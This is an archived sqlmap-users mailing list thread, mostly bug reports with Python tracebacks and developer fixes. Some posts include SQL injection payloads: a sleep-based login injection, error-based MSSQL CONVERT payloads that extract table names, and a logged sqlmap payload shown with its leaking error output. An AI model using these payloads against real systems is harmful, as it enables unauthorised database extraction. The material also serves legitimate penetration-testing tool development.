> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>



-- 
Miroslav Stampar

E-mail: miroslav.stampar (at) gmail.com
PGP Key ID: 0xB5397B1B

[sqlmap-users] another unicode error

[Devon M. <dev...@ya...>]

Here's another example.  Also, a lot of arabic data is coming down as ?????? instead of the Unicode data.  Some works, some doesn't.  At any rate, here is the debug data:

sqlmap version: 1.0-dev (r3893)
Python version: 2.7.1+
Operating system: posix
Command line: ./sqlmap.py -u ********************************** -D ********* -T **** --dump
Technique: UNION
Back-end DBMS: MySQL (fingerprinted)
Traceback (most recent call last):
  File "./sqlmap.py", line 83, in main
    start()
  File "/opt/sqlmap-dev/lib/controller/controller.py", line 485, in start
    action()
  File "/opt/sqlmap-dev/lib/controller/action.py", line 109, in action
    conf.dbmsHandler.dumpTable()
  File "/opt/sqlmap-dev/plugins/generic/enumeration.py", line 1508, in dumpTable
    entries = inject.getValue(query, blind=False, dump=True)
  File "/opt/sqlmap-dev/lib/request/inject.py", line 432, in getValue
    value = __goInband(query, expected, sort, resumeValue, unpack, dump)
  File "/opt/sqlmap-dev/lib/request/inject.py", line 384, in __goInband
    output = unionUse(expression, unpack=unpack, dump=dump)
  File "/opt/sqlmap-dev/lib/techniques/inband/union/use.py", line 266, in unionUse
    output = __oneShotUnionUse(limitedExpr, unpack)
  File "/opt/sqlmap-dev/lib/techniques/inband/union/use.py", line 65, in __oneShotUnionUse
    page, headers = Request.queryPage(payload, content=True, raise404=False)
  File "/opt/sqlmap-dev/lib/request/connect.py", line 575, in queryPage
    page, headers = Connect.getPage(url=uri, get=get, post=post, cookie=cookie, ua=ua, referer=referer, silent=silent, method=method, auxHeaders=auxHeaders, response=response, raise404=raise404, ignoreTimeout=timeBasedCompare)
  File "/opt/sqlmap-dev/lib/request/connect.py", line 282, in getPage
    page = decodePage(page, responseHeaders.get(HTTPHEADER.CONTENT_ENCODING), responseHeaders.get(HTTPHEADER.CONTENT_TYPE))
  File "/opt/sqlmap-dev/lib/request/basic.py", line 189, in decodePage
    page = getUnicode(page, kb.pageEncoding)
  File "/opt/sqlmap-dev/lib/core/common.py", line 1801, in getUnicode
    return unicode(value, encoding or UNICODE_ENCODING, errors="xmlcharrefreplace")
TypeError: don't know how to handle UnicodeDecodeError in error callback

[sqlmap-users] error with unicode data

[Devon M. <dev...@ya...>]

I've been having a lot of these recently:

sqlmap version: 1.0-dev (r3893)
Python version: 2.7.1+
Operating system: posix
Command line: ./sqlmap.py -u ************************** -D ************ -T *** --dump
Technique: UNION
Back-end DBMS: MySQL (fingerprinted)
Traceback (most recent call last):
  File "./sqlmap.py", line 83, in main
    start()
  File "/opt/sqlmap-dev/lib/controller/controller.py", line 485, in start
    action()
  File "/opt/sqlmap-dev/lib/controller/action.py", line 109, in action
    conf.dbmsHandler.dumpTable()
  File "/opt/sqlmap-dev/plugins/generic/enumeration.py", line 1508, in dumpTable
    entries = inject.getValue(query, blind=False, dump=True)
  File "/opt/sqlmap-dev/lib/request/inject.py", line 432, in getValue
    value = __goInband(query, expected, sort, resumeValue, unpack, dump)
  File "/opt/sqlmap-dev/lib/request/inject.py", line 384, in __goInband
    output = unionUse(expression, unpack=unpack, dump=dump)
  File "/opt/sqlmap-dev/lib/techniques/inband/union/use.py", line 266, in unionUse
    output = __oneShotUnionUse(limitedExpr, unpack)
  File "/opt/sqlmap-dev/lib/techniques/inband/union/use.py", line 65, in __oneShotUnionUse
    page, headers = Request.queryPage(payload, content=True, raise404=False)
  File "/opt/sqlmap-dev/lib/request/connect.py", line 575, in queryPage
    page, headers = Connect.getPage(url=uri, get=get, post=post, cookie=cookie, ua=ua, referer=referer, silent=silent, method=method, auxHeaders=auxHeaders, response=response, raise404=raise404, ignoreTimeout=timeBasedCompare)
  File "/opt/sqlmap-dev/lib/request/connect.py", line 282, in getPage
    page = decodePage(page, responseHeaders.get(HTTPHEADER.CONTENT_ENCODING), responseHeaders.get(HTTPHEADER.CONTENT_TYPE))
  File "/opt/sqlmap-dev/lib/request/basic.py", line 189, in decodePage
    page = getUnicode(page, kb.pageEncoding)
  File "/opt/sqlmap-dev/lib/core/common.py", line 1801, in getUnicode
    return unicode(value, encoding or UNICODE_ENCODING, errors="xmlcharrefreplace")
TypeError: don't know how to handle UnicodeDecodeError in error callback

Re: [sqlmap-users] sqlmap bag report

[Miroslav S. <mir...@gm...>]

hi itxx.

thank you for your report and find it fixed in the latest commit.

kr

2011/5/14 星星 <it...@qq...>:
> sqlmap version: 1.0-dev (r3891)
> Python version: 2.6.5
> Operating system: posix
> Command line: ./sqlmap.py -l /root/google
> Technique: None
> Back-end DBMS: PostgreSQL (fingerprinted)
> Traceback (most recent call last):
>   File "./sqlmap.py", line 83, in main
>     start()
>   File "/pentest/web/scanners/sqlmap/lib/controller/controller.py", line
> 283, in start
>     if not checkConnection(suppressOutput=conf.forms) or not checkString()
> or not checkRegexp():
>   File "/pentest/web/scanners/sqlmap/lib/controller/checks.py", line 861, in
> checkConnection
>     page, _ = Request.queryPage(content=True, noteResponseTime=False)
>   File "/pentest/web/scanners/sqlmap/lib/request/connect.py", line 575, in
> queryPage
>     page, headers = Connect.getPage(url=uri, get=get, post=post,
> cookie=cookie, ua=ua, referer=referer, silent=silent, method=method,
> auxHeaders=auxHeaders, response=response, raise404=raise404,
> ignoreTimeout=timeBasedCompare)
>   File "/pentest/web/scanners/sqlmap/lib/request/connect.py", line 195, in
> getPage
>     headers[unicodeencode(key, kb.pageEncoding)] = unicodeencode(item,
> kb.pageEncoding)
>   File "/pentest/web/scanners/sqlmap/lib/core/convert.py", line 140, in
> unicodeencode
>     retVal = value.encode(UNICODE_ENCODING, errors="replace")
> TypeError: encode() takes no keyword arguments
>
> [*] shutting down at: 22:59:55
>
>
> ------------------------------------------------------------------------------
> Achieve unprecedented app performance and reliability
> What every C/C++ and Fortran developer should know.
> Learn how Intel has extended the reach of its next-generation tools
> to help boost performance applications - inlcuding clusters.
> http://p.sf.net/sfu/intel-dev2devmay
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>



-- 
Miroslav Stampar

E-mail: miroslav.stampar (at) gmail.com
PGP Key ID: 0xB5397B1B

[sqlmap-users] sqlmap bag report

[星星 <it...@qq...>]

sqlmap version: 1.0-dev (r3891)
Python version: 2.6.5
Operating system: posix
Command line: ./sqlmap.py -l /root/google
Technique: None
Back-end DBMS: PostgreSQL (fingerprinted)
Traceback (most recent call last):
  File "./sqlmap.py", line 83, in main
    start()
  File "/pentest/web/scanners/sqlmap/lib/controller/controller.py", line 283, in start
    if not checkConnection(suppressOutput=conf.forms) or not checkString() or not checkRegexp():
  File "/pentest/web/scanners/sqlmap/lib/controller/checks.py", line 861, in checkConnection
    page, _ = Request.queryPage(content=True, noteResponseTime=False)
  File "/pentest/web/scanners/sqlmap/lib/request/connect.py", line 575, in queryPage
    page, headers = Connect.getPage(url=uri, get=get, post=post, cookie=cookie, ua=ua, referer=referer, silent=silent, method=method, auxHeaders=auxHeaders, response=response, raise404=raise404, ignoreTimeout=timeBasedCompare)
  File "/pentest/web/scanners/sqlmap/lib/request/connect.py", line 195, in getPage
    headers[unicodeencode(key, kb.pageEncoding)] = unicodeencode(item, kb.pageEncoding)
  File "/pentest/web/scanners/sqlmap/lib/core/convert.py", line 140, in unicodeencode
    retVal = value.encode(UNICODE_ENCODING, errors="replace")
TypeError: encode() takes no keyword arguments

[*] shutting down at: 22:59:55

Re: [sqlmap-users] [*] starting at: 15:38:48

[Miroslav S. <mir...@gm...>]

hi Francisco.

you are using pretty outdated version (0.6.4). please either:

A) update to the latest version (1.0/dev) from our repository:
svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev

or

B) download latest stable version (0.9) from sourceforge:
http://downloads.sourceforge.net/sqlmap/sqlmap-0.9.tar.gz

kr

On Thu, May 12, 2011 at 9:40 PM, Francisco Correa S.
<pan...@gm...> wrote:
> [*] starting at: 15:38:48
>
> [15:38:48] [INFO] updating sqlmap
> [15:38:49] [ERROR] unhandled exception in sqlmap/0.6.4, please copy the
> command line and the following text and send by e-mail to
> sql...@li.... The developers will fix it as soon as
> possible:
> sqlmap version: 0.6.4
> Python version: 2.6.6
> Operating system: linux2
> Traceback (most recent call last):
>   File "/usr/bin/sqlmap", line 78, in main
>     init(cmdLineOptions)
>   File "/usr/share/sqlmap/lib/core/option.py", line 770, in init
>     update()
>   File "/usr/share/sqlmap/lib/core/update.py", line 349, in update
>     __updateSqlmap()
>   File "/usr/share/sqlmap/lib/core/update.py", line 246, in __updateSqlmap
>     logger.errMsg(errMsg)
> AttributeError: Logger instance has no attribute 'errMsg'
>
> [*] shutting down at: 15:38:49
>
>
> --
> Francisco Correa
>
>
> ------------------------------------------------------------------------------
> Achieve unprecedented app performance and reliability
> What every C/C++ and Fortran developer should know.
> Learn how Intel has extended the reach of its next-generation tools
> to help boost performance applications - inlcuding clusters.
> http://p.sf.net/sfu/intel-dev2devmay
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>



-- 
Miroslav Stampar

E-mail: miroslav.stampar (at) gmail.com
PGP Key ID: 0xB5397B1B

[sqlmap-users] [*] starting at: 15:38:48

[Francisco C. S. <pan...@gm...>]

[*] starting at: 15:38:48

[15:38:48] [INFO] updating sqlmap
[15:38:49] [ERROR] unhandled exception in sqlmap/0.6.4, please copy the
command line and the following text and send by e-mail to
sql...@li.... The developers will fix it as soon as
possible:
sqlmap version: 0.6.4
Python version: 2.6.6
Operating system: linux2
Traceback (most recent call last):
  File "/usr/bin/sqlmap", line 78, in main
    init(cmdLineOptions)
  File "/usr/share/sqlmap/lib/core/option.py", line 770, in init
    update()
  File "/usr/share/sqlmap/lib/core/update.py", line 349, in update
    __updateSqlmap()
  File "/usr/share/sqlmap/lib/core/update.py", line 246, in __updateSqlmap
    logger.errMsg(errMsg)
AttributeError: Logger instance has no attribute 'errMsg'

[*] shutting down at: 15:38:49


-- 
Francisco Correa

[sqlmap-users] Major improvement to --dump

[Bernardo D. A. G. <ber...@gm...>]

Hi,

A couple of days ago we have fixed a minor bug in --dump-all (thanks
for the bug report!) and took the chance to improve --dump too.

Now --dump can be used to:
* Dump the entries of all tables within the current database by not
providing the database name with -D. For instance: --dump
* Dump the entries of specific table(s) in the current database by not
providing the database name with -D. For instance: --dump -T
table1,table2
* Dump the entries of all tables in a provided database name. For
instance: --dump -D testdb
* Dump the entries of specific table(s) in a provided database name.
For instance: --dump -T table1,table2 -D testdb

Note that -C is always supported. If provided, it will dump only those
table(s) columns' entries.
As usual, --exclude-sysdbs, --start, --stop, --first and --last are
all still supported.

Cheers,
Bernardo


-- 
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)
PGP Key ID: 0x05F5A30F

Re: [sqlmap-users] POST injection

[Bernardo D. A. G. <ber...@gm...>]

Hi James,

On 8 May 2011 21:33,  <ja...@ev...> wrote:
> Hi,
>
>  I was recently messing around with another scanner and I found an
> injection I'd like to play around with in Sqlmap.
>
>  The injection found is a POST to something.asp and its "
> action=login&login=whatever'=sleep(15)='&password= ". I verified it
> manually and its good to go, however I've not yet been able to get
> SQLmap to detect and exploit it.

I don't get the payload. Is it literally: whatever'=sleep(15=' ?

If so, those two equal sign do not look to me like valid SQL. Can you
check with the other scanner what exact payload got injected? What is
the back-end DBMS?

Thank you.

-- 
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)
PGP Key ID: 0x05F5A30F

Re: [sqlmap-users] POST injection

[<ja...@ev...>]

Hi,

 I think i already tried that but I'll give it another go and report
back

-j
On Sun, 8 May 2011 23:35:18 +0300, Ahmed Shawky <ah...@is...>
wrote:
> try --level 3 --risk 3
> 
> On Sun, May 8, 2011 at 11:33 PM,  wrote:
>  Hi,
> 
>   I was recently messing around with another scanner and I found an
>  injection I'd like to play around with in Sqlmap.
> 
>   The injection found is a POST to something.asp and its "
>  action=login&login=whatever'=sleep(15)='&password= ". I verified it
>  manually and its good to go, however I've not yet been able to get
>  SQLmap to detect and exploit it.
> 
>   I've been messing with --prefix and --suffix but I cant get any
> joy.
> 
>   Any ideas on this boys?
> 
>  Thanks in advance,
>  James
> 
>
> ------------------------------------------------------------------------------
>  WhatsUp Gold - Download Free Network Management Software
>  The most intuitive, comprehensive, and cost-effective network
>  management toolset available today.  Delivers lowest initial
>  acquisition cost and overall TCO of any competing solution.
>  http://p.sf.net/sfu/whatsupgold-sd [2]
>  _______________________________________________
>  sqlmap-users mailing list
>  sql...@li... [3]
>  https://lists.sourceforge.net/lists/listinfo/sqlmap-users [4]

Re: [sqlmap-users] POST injection

[Ahmed S. <ah...@is...>]

try --level 3 --risk 3

On Sun, May 8, 2011 at 11:33 PM, <ja...@ev...> wrote:

> Hi,
>
>  I was recently messing around with another scanner and I found an
> injection I'd like to play around with in Sqlmap.
>
>  The injection found is a POST to something.asp and its "
> action=login&login=whatever'=sleep(15)='&password= ". I verified it
> manually and its good to go, however I've not yet been able to get
> SQLmap to detect and exploit it.
>
>  I've been messing with --prefix and --suffix but I cant get any joy.
>
>  Any ideas on this boys?
>
> Thanks in advance,
> James
>
>
>
> ------------------------------------------------------------------------------
> WhatsUp Gold - Download Free Network Management Software
> The most intuitive, comprehensive, and cost-effective network
> management toolset available today.  Delivers lowest initial
> acquisition cost and overall TCO of any competing solution.
> http://p.sf.net/sfu/whatsupgold-sd
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>



-- 

   - Ahmed Shawky El-Antry
   - Pen-tester, Programmer and System administrator
   - lnxg33k owner "http://lnxg33k.wordpress.com"
   - Isecur1ty team member"http://www.isecur1ty.org"
   - Twitter @lnxg33k

[sqlmap-users] POST injection

[<ja...@ev...>]

Hi,

 I was recently messing around with another scanner and I found an 
injection I'd like to play around with in Sqlmap.

 The injection found is a POST to something.asp and its " 
action=login&login=whatever'=sleep(15)='&password= ". I verified it 
manually and its good to go, however I've not yet been able to get 
SQLmap to detect and exploit it.

 I've been messing with --prefix and --suffix but I cant get any joy.

 Any ideas on this boys?

Thanks in advance,
James

Re: [sqlmap-users] Concating sub-queries with strings

[Miroslav S. <mir...@gm...>]

hi execute.

this was retested at least 100 times.

snippet (against MSSQL 2005):

[12:45:38] [PAYLOAD] 1' AND 5424=CONVERT(INT,(CHAR(58)+CHAR(105)+CHAR(112)+CHAR(
121)+CHAR(58)+(SELECT TOP 1 SUBSTRING((ISNULL(CAST(sysusers.name+CHAR(46)+sysobj
ects.name AS NVARCHAR(4000)),CHAR(32))),1,100) FROM testdb..sysobjects INNER JOI
N sysusers ON sysobjects.uid = sysusers.uid WHERE xtype IN (CHAR(117), CHAR(118)
) AND sysusers.name+CHAR(46)+sysobjects.name NOT IN (SELECT TOP 2 ISNULL(sysuser
s.name+CHAR(46)+sysobjects.name,CHAR(32)) FROM testdb..sysobjects INNER JOIN sys
users ON sysobjects.uid = sysusers.uid WHERE xtype IN (CHAR(117), CHAR(118)) ORD
ER BY 1) ORDER BY 1)+CHAR(58)+CHAR(106)+CHAR(110)+CHAR(116)+CHAR(58))) AND 'vVWe
'='vVWe
[12:45:38] [DEBUG] got HTTP error code: 500 (Internal Server Error)
[12:45:38] [INFO] parsed error message: 'Microsoft OLE DB Provider for ODBC Driv
ers (0x80040E07)
[Microsoft][ODBC SQL Server Driver][SQL Server]Conversion failed when converting
 the nvarchar value ':ipy:dbo.users:jnt:' to data type int.
<b>/sqlmap/mssql/iis/get_int.asp, line 27</b>'

i am not sure what's wrong with your case. you can contact me
privatelly and send me some more info.

kr

On Sat, May 7, 2011 at 7:46 PM, execute <ex...@gm...> wrote:
> Hey,
> I'm using the error-based technique for extracting data from an MSSQL server
> (2005 - 9.00.4053.00). It seems like concating the sub-query with a string
> doesn't work well - for some reason, the webserver returns the regular
> response for row not found instead of throwing an error.
> I tested it manually and found the following:
>
> ') AND 3792=CONVERT(INT,(SELECT TOP 1 name FROM sysobjects WHERE xtype =
> 'U')) -- - Works well - throws an error with a table name ("Conversion
> failed when converting the nvarchar value 'TABLE-NAME' to data type int.")
> ') AND 3792=CONVERT(INT,(SELECT TOP 1 'x:' + name FROM sysobjects WHERE
> xtype = 'U')) -- - Works well - throws an error with a table name
> ("Conversion failed when converting the nvarchar value 'x:TABLE-NAME' to
> data type int.")
> ') AND 3792=CONVERT(INT,'x:'+(SELECT TOP 1 name FROM sysobjects WHERE xtype
> = 'U')) -- - Doesn't work - just returns 'page not found' (not an 404 error,
> an error from the script telling that no rows were found)
>
> Can anyone test and confirm this? I'm not quite sure why that happens, but
> it seems like it can easily be fixed by adding the strings inside the
> sub-query (SELECT ':foo'+...+':bar:') instead of outside of it as it does
> now.
> Thanks
>
> ------------------------------------------------------------------------------
> WhatsUp Gold - Download Free Network Management Software
> The most intuitive, comprehensive, and cost-effective network
> management toolset available today.  Delivers lowest initial
> acquisition cost and overall TCO of any competing solution.
> http://p.sf.net/sfu/whatsupgold-sd
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>



-- 
Miroslav Stampar

E-mail: miroslav.stampar (at) gmail.com
PGP Key ID: 0xB5397B1B

Re: [sqlmap-users] infinite loop

[Bernardo D. A. G. <ber...@gm...>]

Please find it fixed now, r3860.
Thanks for reporting.

Bernardo

On 7 May 2011 17:36, ultramegaman <sec...@ul...> wrote:
> Rev. 3854
> I was running it in a screen session, so I'm missing the top part of
> the error message. The only command-line flag given was --dump-all
> Sorry I can't be more helpful.
>
>
>  File "/tmp/sqlmap-dev/plugins/generic/enumeration.py", line 1683, in dumpAll
>    data = self.dumpTable()
>  File "/tmp/sqlmap-dev/plugins/generic/enumeration.py", line 1395, in dumpTable
>    return self.dumpAll()
>  File "/tmp/sqlmap-dev/plugins/generic/enumeration.py", line 1683, in dumpAll
>    data = self.dumpTable()
>  File "/tmp/sqlmap-dev/plugins/generic/enumeration.py", line 1395, in dumpTable
>    return self.dumpAll()
>  File "/tmp/sqlmap-dev/plugins/generic/enumeration.py", line 1683, in dumpAll
>    data = self.dumpTable()
>  File "/tmp/sqlmap-dev/plugins/generic/enumeration.py", line 1395, in dumpTable
>    return self.dumpAll()
>  File "/tmp/sqlmap-dev/plugins/generic/enumeration.py", line 1683, in dumpAll
>    data = self.dumpTable()
>  File "/tmp/sqlmap-dev/plugins/generic/enumeration.py", line 1395, in dumpTable
>    return self.dumpAll()
>  File "/tmp/sqlmap-dev/plugins/generic/enumeration.py", line 1683, in dumpAll
>    data = self.dumpTable()
>  File "/tmp/sqlmap-dev/plugins/generic/enumeration.py", line 1395, in dumpTable
>    return self.dumpAll()
>  File "/tmp/sqlmap-dev/plugins/generic/enumeration.py", line 1683, in dumpAll
>    data = self.dumpTable()
>  File "/tmp/sqlmap-dev/plugins/generic/enumeration.py", line 1395, in dumpTable
>    return self.dumpAll()
>  File "/tmp/sqlmap-dev/plugins/generic/enumeration.py", line 1683, in dumpAll
>    data = self.dumpTable()
>  File "/tmp/sqlmap-dev/plugins/generic/enumeration.py", line 1395, in dumpTable
>    return self.dumpAll()
>  File "/tmp/sqlmap-dev/plugins/generic/enumeration.py", line 1683, in dumpAll
>    data = self.dumpTable()
>  File "/tmp/sqlmap-dev/plugins/generic/enumeration.py", line 1395, in dumpTable
>    return self.dumpAll()
>  File "/tmp/sqlmap-dev/plugins/generic/enumeration.py", line 1683, in dumpAll
>    data = self.dumpTable()
>  File "/tmp/sqlmap-dev/plugins/generic/enumeration.py", line 1395, in dumpTable
>    return self.dumpAll()
>  File "/tmp/sqlmap-dev/plugins/generic/enumeration.py", line 1683, in dumpAll
>    data = self.dumpTable()
>  File "/tmp/sqlmap-dev/plugins/generic/enumeration.py", line 1395, in dumpTable
>    return self.dumpAll()
>  File "/tmp/sqlmap-dev/plugins/generic/enumeration.py", line 1683, in dumpAll
>    data = self.dumpTable()
>  File "/tmp/sqlmap-dev/plugins/generic/enumeration.py", line 1395, in dumpTable
>    return self.dumpAll()
>  File "/tmp/sqlmap-dev/plugins/generic/enumeration.py", line 1683, in dumpAll
>    data = self.dumpTable()
>  File "/tmp/sqlmap-dev/plugins/generic/enumeration.py", line 1395, in dumpTable
>    return self.dumpAll()
>  File "/tmp/sqlmap-dev/plugins/generic/enumeration.py", line 1683, in dumpAll
>    data = self.dumpTable()
>  File "/tmp/sqlmap-dev/plugins/generic/enumeration.py", line 1395, in dumpTable
>    return self.dumpAll()
>  File "/tmp/sqlmap-dev/plugins/generic/enumeration.py", line 1683, in dumpAll
>    data = self.dumpTable()
>  File "/tmp/sqlmap-dev/plugins/generic/enumeration.py", line 1395, in dumpTable
>    return self.dumpAll()
>  File "/tmp/sqlmap-dev/plugins/generic/enumeration.py", line 1683, in dumpAll
>    data = self.dumpTable()
>  File "/tmp/sqlmap-dev/plugins/generic/enumeration.py", line 1395, in dumpTable
>    return self.dumpAll()
>  File "/tmp/sqlmap-dev/plugins/generic/enumeration.py", line 1683, in dumpAll
>    data = self.dumpTable()
>  File "/tmp/sqlmap-dev/plugins/generic/enumeration.py", line 1395, in dumpTable
>    return self.dumpAll()
>  File "/tmp/sqlmap-dev/plugins/generic/enumeration.py", line 1683, in dumpAll
>    data = self.dumpTable()
>  File "/tmp/sqlmap-dev/plugins/generic/enumeration.py", line 1395, in dumpTable
>    return self.dumpAll()
>  File "/tmp/sqlmap-dev/plugins/generic/enumeration.py", line 1683, in dumpAll
>    data = self.dumpTable()
>  File "/tmp/sqlmap-dev/plugins/generic/enumeration.py", line 1395, in dumpTable
>    return self.dumpAll()
>  File "/tmp/sqlmap-dev/plugins/generic/enumeration.py", line 1683, in dumpAll
>    data = self.dumpTable()
>  File "/tmp/sqlmap-dev/plugins/generic/enumeration.py", line 1395, in dumpTable
>    return self.dumpAll()
>  File "/tmp/sqlmap-dev/plugins/generic/enumeration.py", line 1663, in dumpAll
>    logger.info(infoMsg)
>  File "/usr/lib/python2.6/logging/__init__.py", line 1056, in info
>    self._log(INFO, msg, args, **kwargs)
>  File "/usr/lib/python2.6/logging/__init__.py", line 1173, in _log
>    self.handle(record)
>  File "/usr/lib/python2.6/logging/__init__.py", line 1183, in handle
>    self.callHandlers(record)
>  File "/usr/lib/python2.6/logging/__init__.py", line 1220, in callHandlers
>    hdlr.handle(record)
>  File "/usr/lib/python2.6/logging/__init__.py", line 679, in handle
>    self.emit(record)
>  File "/usr/lib/python2.6/logging/__init__.py", line 804, in emit
>    self.handleError(record)
>  File "/usr/lib/python2.6/logging/__init__.py", line 733, in handleError
>    traceback.print_exception(ei[0], ei[1], ei[2], None, sys.stderr)
>  File "/usr/lib/python2.6/traceback.py", line 125, in print_exception
>    print_tb(tb, limit, file)
>  File "/usr/lib/python2.6/traceback.py", line 57, in print_tb
>    if hasattr(sys, 'tracebacklimit'):
> AttributeError: 'module' object has no attribute 'tracebacklimit'


-- 
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)
PGP Key ID: 0x05F5A30F

Re: [sqlmap-users] Microsoft Access Bug

[Bernardo D. A. G. <ber...@gm...>]

Find it fixed in the last commit, r3857.
Thanks for reporting.

Bernardo

On 7 May 2011 14:20, Alexander Hagenah <ah...@pr...> wrote:
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> sqlmap version: 1.0-dev (r3854)
> Python version: 2.6.6
> Operating system: posix
> Command line: ./sqlmap.py -u
> ***********************************************************************
> - --is-dba
> Technique: UNION
> Back-end DBMS: Microsoft Access (fingerprinted)
> Traceback (most recent call last):
>  File "./sqlmap.py", line 83, in main
>    start()
>  File "/home/tools/sqlmap/lib/controller/controller.py", line 494, in start
>    action()
>  File "/home/tools/sqlmap/lib/controller/action.py", line 70, in action
>    conf.dumper.dba(conf.dbmsHandler.isDba())
>  File "/home/tools/sqlmap/plugins/generic/enumeration.py", line 151, in
> isDba
>    query = queries[Backend.getIdentifiedDbms()].is_dba.query
>  File "/home/tools/sqlmap/extra/xmlobject/xmlobject.py", line 372, in
> __getattr__
>    raise AttributeError(attr)
> AttributeError: query
>
> [*] shutting down at: 16:00:39
>
> - --
> Alexander Hagenah
>
> Dubai, UAE.
> Mobile: +971 (0)50 6448151
>
> Key ID (2048bit): 0x354C0DDB
> Fingerprint: FBA1 439F 7343 3729 18AF D62C 54DE FD22 354C 0DDB
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v1.4.11 (GNU/Linux)
>
> iEYEARECAAYFAk3FRy4ACgkQVN79IjVMDdvRcgCgpnYcNTfobHClUHVj2bsZIiaM
> yLsAn14wNdKJopF0FTFLa9uKxmVXivdn
> =B6C6
> -----END PGP SIGNATURE-----


-- 
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)
PGP Key ID: 0x05F5A30F